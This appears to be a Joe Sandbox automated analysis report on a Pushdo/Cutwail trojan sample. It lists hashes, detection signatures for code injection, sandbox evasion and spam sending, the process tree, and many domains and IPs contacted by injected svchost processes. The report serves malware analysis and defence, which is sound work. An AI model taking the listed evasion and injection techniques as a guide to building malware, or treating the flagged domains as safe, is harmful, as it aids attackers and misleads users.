Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
OWd39WUX3D.exe

Overview

General Information

Sample Name:OWd39WUX3D.exe
Original Sample Name:dc6330aff08812b5dbaf66cf0671cb20.exe
Analysis ID:1308712
MD5:dc6330aff08812b5dbaf66cf0671cb20
SHA1:12ce2b2bf8bceb6862db8ae9f8af9e709844d051
SHA256:3f45f9a83b45320ea3d0350d7d4f221a3a575a42a8e6928ae6cc158ff41256b8
Tags:32Cutwailexetrojan
Infos:

Detection

Pushdo
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Yara detected Backdoor Pushdo
Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Found evasive API chain (may stop execution after checking mutex)
Found stalling execution ending in API Sleep call
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Send many emails (e-Mail Spam)
Opens the same file many times (likely Sandbox evasion)
Contains functionality to inject code into remote processes
Contains functionality to compare user and computer (likely to detect sandboxes)
Writes to foreign memory regions
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Machine Learning detection for dropped file
Drops PE files to the user root directory
Contains functionality to inject threads in other processes
Tries to resolve many domain names, but no domain seems valid
Contains functionality to detect sleep reduction / modifications
Found decision node followed by non-executed suspicious APIs
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Drops PE files to the user directory
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Connects to many different domains
Found inlined nop instructions (likely shell or obfuscated code)
Connects to several IPs in different countries
Uses SMTP (mail sending)
Found evasive API chain (may stop execution after accessing registry keys)
Creates or modifies windows services
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to query network adapater information

Classification

  • System is w10x64
  • OWd39WUX3D.exe (PID: 7080 cmdline: C:\Users\user\Desktop\OWd39WUX3D.exe MD5: DC6330AFF08812B5DBAF66CF0671CB20)
    • svchost.exe (PID: 5872 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
    • svchost.exe (PID: 4164 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 4636 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 532 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 64 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 5268 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
    • svchost.exe (PID: 24032 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • pigalicapi.exe (PID: 6732 cmdline: "C:\Users\user\pigalicapi.exe" MD5: DC6330AFF08812B5DBAF66CF0671CB20)
    • svchost.exe (PID: 6424 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
    • svchost.exe (PID: 5492 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 23024 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 23080 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 23196 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 23328 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
PushdoPushdo is usually classified as a "downloader" trojan - meaning its true purpose is to download and install additional malicious software. There are dozens of downloader trojan families out there, but Pushdo is actually more sophisticated than most, but that sophistication lies in the Pushdo control server rather than the trojan.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.pushdo
No configs have been found
SourceRuleDescriptionAuthorStrings
00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
    SourceRuleDescriptionAuthorStrings
    1.2.pigalicapi.exe.5d0000.1.raw.unpackJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
      17.2.svchost.exe.4000000.2.unpackJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
        1.2.pigalicapi.exe.5d0000.1.unpackJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
          30.2.svchost.exe.4000000.5.unpackJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
            11.2.svchost.exe.4000000.3.unpackJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
              No Sigma rule has matched
              Timestamp:192.168.2.3104.21.23.949712802016867 09/15/23-07:26:04.055516
              SID:2016867
              Source Port:49712
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: http://gpthink.com/product/204.htmlAvira URL Cloud: Label: malware
              Source: http://www.credo.edu.pl/Avira URL Cloud: Label: malware
              Source: https://www.aevga.com/Avira URL Cloud: Label: malware
              Source: http://www.valselit.com/177-appartement-a-vendre-sigean-30378Avira URL Cloud: Label: malware
              Source: C:\Users\user\pigalicapi.exeAvira: detection malicious, Label: TR/AD.Cutwail.rludr
              Source: OWd39WUX3D.exeReversingLabs: Detection: 29%
              Source: OWd39WUX3D.exeVirustotal: Detection: 38%Perma Link
              Source: OWd39WUX3D.exeAvira: detected
              Source: webways.comVirustotal: Detection: 8%Perma Link
              Source: www.tyrns.comVirustotal: Detection: 9%Perma Link
              Source: s5w.comVirustotal: Detection: 8%Perma Link
              Source: bd-style.comVirustotal: Detection: 7%Perma Link
              Source: any-s.netVirustotal: Detection: 5%Perma Link
              Source: C:\Users\user\pigalicapi.exeReversingLabs: Detection: 29%
              Source: OWd39WUX3D.exeJoe Sandbox ML: detected
              Source: C:\Users\user\pigalicapi.exeJoe Sandbox ML: detected
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_005D8A70 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,1_2_005D8A70
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_005D8800 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptImportKey,CryptExportKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,1_2_005D8800
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_005D8970 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,1_2_005D8970
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_005D47F0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptDestroyHash,CryptReleaseContext,1_2_005D47F0
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_005D8BB0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,1_2_005D8BB0
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_005D4BA0 CoInitialize,SetEvent,WaitForSingleObject,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetCurrentThreadId,GetSystemMetrics,GetSystemMetrics,GlobalMemoryStatus,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,wsprintfA,CryptBinaryToStringA,MultiByteToWideChar,VirtualFree,EnterCriticalSection,VirtualAlloc,VirtualAlloc,GetTickCount,VirtualFree,LeaveCriticalSection,VirtualFree,VirtualFree,VirtualFree,VirtualFree,CoUninitialize,1_2_005D4BA0
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_005D8CF0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,1_2_005D8CF0
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_005D4880 CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptDestroyHash,CryptReleaseContext,1_2_005D4880
              Source: OWd39WUX3D.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 172.67.164.178:443 -> 192.168.2.3:50183 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.3:50157 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.3:50193 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.3:50209 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.3:50211 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.156.49:443 -> 192.168.2.3:50245 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.164.178:443 -> 192.168.2.3:50247 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 75.2.95.235:443 -> 192.168.2.3:50242 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.52.126:443 -> 192.168.2.3:50251 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 83.223.113.46:443 -> 192.168.2.3:50248 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.3:50261 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.3:50255 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 5.189.171.125:443 -> 192.168.2.3:50277 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 75.2.95.235:443 -> 192.168.2.3:62797 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.52.126:443 -> 192.168.2.3:63074 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.3:63778 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 83.223.113.46:443 -> 192.168.2.3:63835 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.3:64256 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.3:64102 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.3:64134 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.164.178:443 -> 192.168.2.3:64377 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.3:64318 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 5.189.171.125:443 -> 192.168.2.3:64328 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.3:64428 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 75.2.95.235:443 -> 192.168.2.3:43302 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.156.49:443 -> 192.168.2.3:44526 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 5.189.171.125:443 -> 192.168.2.3:44804 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.3:44394 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 83.223.113.46:443 -> 192.168.2.3:45042 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.164.178:443 -> 192.168.2.3:45976 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.3:45979 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.3:45999 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.52.126:443 -> 192.168.2.3:46186 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.3:46228 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.3:48033 version: TLS 1.2
              Source: OWd39WUX3D.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_0120F6EF FindFirstFileExW,1_2_0120F6EF
              Source: C:\Users\user\pigalicapi.exeCode function: 5x nop then mov ebx, dword ptr [esp+000000B0h]1_2_0120616F
              Source: C:\Users\user\pigalicapi.exeCode function: 4x nop then cmp ecx, 10h1_2_0120616F
              Source: C:\Users\user\pigalicapi.exeCode function: 4x nop then movzx ebx, bl1_2_0120616F
              Source: C:\Users\user\pigalicapi.exeCode function: 4x nop then movzx ebx, bl1_2_01205553
              Source: C:\Users\user\pigalicapi.exeCode function: 4x nop then cmp dword ptr [esp+08h], 01h1_2_01201761
              Source: C:\Users\user\pigalicapi.exeCode function: 4x nop then mov eax, dword ptr [esp+18h]1_2_01201761
              Source: C:\Users\user\pigalicapi.exeCode function: 4x nop then cmp dword ptr [esp+08h], 01h1_2_01201761
              Source: C:\Users\user\pigalicapi.exeCode function: 4x nop then mov edi, dword ptr [esp+64h]1_2_01201761
              Source: C:\Users\user\pigalicapi.exeCode function: 4x nop then cmp dword ptr [esp+0Ch], 01h1_2_01201761
              Source: C:\Users\user\pigalicapi.exeCode function: 4x nop then mov esi, ecx1_2_01206E24

              Networking

              barindex
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: impexnc.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: webways.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: dayvo.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.252.159.165 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: enguita.net
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: shteeble.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: dataform.co.uk
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: kallman.net
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.69.139.150 25Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: nt-hat.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: gphpedit.org
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: avse.hu
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 5.189.171.125 443
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 194.143.194.23 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 91.229.22.126 443
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 5.39.75.157 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: willsub.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: nts-web.net
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.tyrns.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: shesfit.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.26.121 25Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.74.161.133 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: multip.hu
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 66.226.70.66 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: tcpoa.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 13.248.169.48 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.73.229 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: dog-jog.net
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 18.179.184.212 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: kamptal.at
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.19.254.22 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: bd-style.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 216.177.137.32 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 93.189.66.202 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: zupraha.cz
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.89.126 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: muhr-soehne.de
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.12.155.123 25
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 46.30.60.158 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: oaith.ca
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.nqks.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.99.226.184 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: aiolos-sa.gr
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: usadig.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.26.13.244 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: gmail-smtp-in.l.google.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: fdlymca.org
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: assideum.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: bidroll.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 62.122.170.171 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: karmy.com.pl
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: vdoherty.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.196.25 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ncn.de
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: komie.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ftmobile.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: sledsport.ru
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: tbvlugus.nl
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: pellys.co.uk
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.cokocoko.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: semuk.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: tozzhin.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 195.96.252.188 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: de
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.airmail.net
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: lyto.net
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: websy.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: 106west.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ruzee.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.230.63.107 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: nblewis.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: amba-tc.si
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.185.159.144 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: mxs.mail.ru
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: averwin.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 211.13.196.162 25Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 141.193.213.20 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: chzko.ru
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 76.223.35.103 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 92.204.129.113 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: themark.org
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: clysma.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ossir.org
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.medius.si
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: e-kami.net
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: scintel.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: kewlmail.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: flamingorecordings.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: bount.com.tw
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: actmin.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 75.2.70.75 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: bosado.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: pers.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: mackusick.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: angework.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail7.digitalwaves.co.nz
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 202.53.77.146 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: reproar.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: hes.pt
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 188.94.254.88 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: portoccd.org
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 162.241.233.114 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: avc.com.sa
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: cnti.krsn.ru
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.194.190.151 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ultibax.org
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: dspears.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.217.118.81 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.owsports.ca
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.235.59 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: bggs.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: unicus.jp
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.yocinc.org
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 89.31.143.1 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: cyclad.pl
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: clinicasanluis.com.co
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ludomemo.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: michiana.org
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: peminet.net
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: umcor.am
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.146.154 25Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ssm.ch
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: wvs-net.de
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.fnw.us
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 173.205.126.33 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: adeesa.net
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.synetik.net
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: strazynski.pl
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: sjbmw.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 153.120.34.73 443
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.27.205 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: amerifor.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 164.90.244.158 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.181.113 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: gujarat.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ifesnet.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: vfcindia.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: aoinko.net
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: cpwpb.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: yoruksut.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: akdeniz.nl
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 205.149.134.32 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: rtcasey.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: gydrozo.ru
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: n23china.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: hamaker.net
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: sigtoa.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 133.125.38.187 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: refintl.org
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: sidepath.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: 89gospel.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: karila.fr
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 15.197.142.173 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: zemarmot.net
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 204.15.134.44 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 66.218.88.159 25
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 157.7.107.49 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: thiessen.net
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 208.80.122.205 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: samtv.ro
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 89.107.169.125 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.237.66.112 443
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: calvinly.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: techtrans.de
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ftchat.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: pcoyuncu.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: kavram.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: webavant.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.156.49 443Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 91.201.52.102 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: yasuma.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 3.94.41.167 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 66.218.88.167 25Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 79.96.32.254 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: 4locals.net
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.20.221.29 25Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 153.122.170.15 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: johnlyon.org
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 65.52.128.33 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 69.89.107.122 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.76.140 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.13 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.14 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 208.91.197.46 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: from30ty.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 46.8.8.200 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: bigzz.by
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: vonparis.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.160.0.179 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: envogen.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: x96.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: kairel.com
